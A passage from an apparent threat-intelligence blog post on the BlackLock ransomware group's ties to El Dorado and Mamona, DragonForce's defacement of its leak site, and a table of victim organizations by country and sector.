The only difference is that DragonForce Ransomware samples have been coded using VC++. In contrast, the acquired samples from BlackLock Ransomware actors were written in Go, and the same pattern was applied to the El Dorado and BlackLock combo. It is possible the actors could leverage AI to convert specific fragments of the code with minimal modifications or modify them. The observed ransom notes dropped on the victim’s machine were also almost identical:

It is unclear if BlackLock Ransomware (as a group) started cooperating with DragonForce Ransomware or silently transitioned under the new ownership. The new masters likely took over the project and their affiliate base because of ransomware market consolidation, understanding their previous successors could be compromised.

On February 28, 2025, the key actor behind BlackLock Ransomware suddenly mentioned a possible “exit” scenario. It is unclear if the actor was aware of planned changes or suspected unexpected events.

DragonForce Takeover

Resecurity may not have been the only one who identified a vulnerability in the DLS of BlackLock and successfully exploited it. On March 20, 2025 – the DLS of BlackLock was defaced and technically liquidated by posting the disclosed configuration files.

Notably, the hack was followed by the publication of chat presumably belonging to BlackLock Ransomware operators. While confirming the chat’s authenticity is impossible, the publicized server-side files are authentic to those acquired by Resecurity during the winter events. It seems DragonForce wanted to shame the group and compromise their operations to eliminate competitors. On the other hand, such tactics could also be used as a “false flag” to further transition to a new project.

In parallel, the day before, the DLS of Mamona ransomware managed by the same actor has also been defaced. The project did not last long – Karol Paciorek from CSIRT KNF identified a possible clearnet IP, which caused panic among affiliates. Facing OPSEC failures, the actor ‘$$$’ was left speechless. DragonForce ransomware representative left a sarcastic comment at RAMP without providing any additional details leading to these events:

Other members of the ransomware community expressed concerns about law enforcement’s possible involvement in targeting the group and their associates. At the same time, the key actors continued to communicate, keeping the audience clueless.

The key actor “$$$” did not share any surprise after incidents with BlackLock and Mamona Ransomware. It is possible the actor was fully aware that his operations could be already compromised, so the silent “exit” from the previous project could be the most rational option. Notably, he has not indicated any anger toward DragonForce Ransomware representatives – opposite calling them “gentlemen,” which may confirm these events could be coordinated between them.

The actor “$$$” has also deleted all references to past ransomware projects and vanished DLS URLs from his signature at RAMP. 

Both BlackLock and Mamona Ransomware went offline.

Taking the Lead

DragonForce ransomware will benefit from the ransomware scene changes as one of the most robust groups having strong technical capabilities and organization. Nevertheless, the operators behind BlackLock, El Dorado, and Mamona Ransomware received a “no place to hide” message, the cybercriminal ecosystem is extremely dynamic and adjusts to force majeure situations. Obviously, the group has suffered significant damage and is unlikely to
be able to recover, as their affiliates may be concerned about cooperating with them now due to multiple OPSEC failures.

At the same time, bigger players like DragonForce may extend a helping hand, taking over their market share. Resecurity released a report on the recent activity of DragonForce, specifically regarding their targeting on Saudi Arabia, and will continue to monitor the group. It is expected that the group will accelerate its activities by building alliances with underground affiliates previously working with other ransomware operators.

Victimology

Website Company Country Downloads Vertical
reesndt.ca Rees NDT Inspection Services Canada 5850 Business Services
evasair.com EVAS Group Canada 71824 Aviation
akantha.fr Akantha France 388193 Legal Services
hasa-arg.com HIDROCARBU ROS ARGENTINOS S.A. Argentina 937918 Industrial
datascan.com Inventory Management and Counting Solutions Texas, United States 164085 Technology
dgenviro.com D&G Enviro- Group Canada 132628 Business Services
relate-infotech.com Relate Infotech United Kingdom 14927 Technology
acumengroup.us Acumen Group California, United States 85460 Technology
lightspeeddesign.com Light Speed Design Washington, United States 245339 Business Services
kandelaar.com Kandelaar Electrotechnie k Netherlands 706048 Technology
fbchighsprings.org First Baptist Church Florida, United States 290792 Religious Organizations
www.midlandturbo.com Midland Turbo United Kingdom 669088 Technology
www.lalucky.com LA LUCKYBrand California, United States 120257 Business Services
tiendascarrion.com Tiendas Carrion & Fernandez Spain 967603 Retail
bellstaxservice.com Bells Tax Service California, United States 533152 Business Services
pcafterhours.net PC AfterHours Minnesota, United States 304375 Technology
myrtlebeachcustomhomebuild er.com Nations Homes Commercial & Residential Construction South Carolina, United States 832767 Business Services
phxcmp.com The PHOENIX Puerto Rico 608588 Technology
barranquitas.pr.gov The Municipal Administration of Barranquitas and its Department of Finance Puerto Rico 515471 Government
keizers.ca Keizer’s Collision CSN & Automotive Canada 380486 Business Services
compra-aruba.com Compra LTD Aruba Aruba 346417 Technology
bshsoft.com Business Systems House FZ-LLC United Arab Emirates 1341397 Technology
gccustommetal.com GC Custom Metal Fabricationsoo n Canada 75755 Industrial
datacampos.com Data Campos Sistemas Brazil 31021 Technology
cucinatagliani.com Cucina Tagliani USA 370617 Retail
mullenwylie.com Mullen Wylie, LLC USA 986992 Legal Services
patricksanderscompany.com Patrick Sanders and Company, P.C. USA 28237 Business Services
cityofpensacola.com Pensacola FL, USA 2106604 Government
a1mobilelock.com A-1 Mobile Lock & Key Washington, USA 38951 Business Services
adamshomes.com Adams Homes USA 433175 Business Services
tankerska.hr ANKERSKA PLOVIDBA d.d. Croatia 342225 Business Services
newriverelectrical.com New River Electrical Corporation USA 665795 Industrial
panzersolutions.com Panzer Solutions LLC Business Services USA 508720 Business Services
avioesforza.it avioesforza.it Italy Visitors: 16858 Business Services
celplan.com CelPlan Technologies, Inc. USA Visitors: 75710 Technology
allianceind.com Alliance Industries, LLC. USA 233981 Business Services
auto-recyclers.com A & L Auto Recyclers Canada 146942 Business Services
burotec.biz BUROTEC S.A. Republique du Congo 21317 Business Services
kennedyfunding.com Kennedy Funding New Jersey, USA  426319 Financial Services
goughconstruction.com Gough Construction Utah, USA 4554 Construction
htetech.com HTE Technologies Missouri, USA 398790 Technology
lindostar.it LINDOSTAR Italy 4938 Technology
premierpackaging.com Premier Packaging Tennessee, USA 16366 Business Services
tbmcg.com TBMConsulting Group, Inc. North Carolina, USA 211568 Business Services
uccretrievals.com UCCRetrievals, Inc. Virginia, USA 170597 Business Services
vet.k-state.edu K-State College of Veterinary Medicine KS, USA 13143 Education
atd-american.com ATD-American USA 472567 Technology
fleetequipment.com Fleet Equipment Center, Inc. IL, USA 7982 Technology
lasen.com Lasen, Inc. 2450 Lakeside Dr, Suite B, Las Cruces, NM 88007, (575) 522-5110 25125 Defense

References

BlackLock Ransomware: What You Need To Know
https://www.tripwire.com/state-of-security/blacklock-ransomware-what-you-need-know

Researchers Confirm BlackLock as Eldorado Rebrand
https://www.infosecurity-magazine.com/news/researchers-confirm-blacklock/

BlackLock On Track to Be 2025’s Most Prolific Ransomware Group
https://www.infosecurity-magazine.com/news/blacklock-2025s-most-prolific/

BlackLock Ransomware Hacked 40+ Organization Within Two Months
https://cybersecuritynews.com/blacklock-ransomware-hacked-40-organization/

Leave a Reply

Your email address will not be published. Required fields are marked *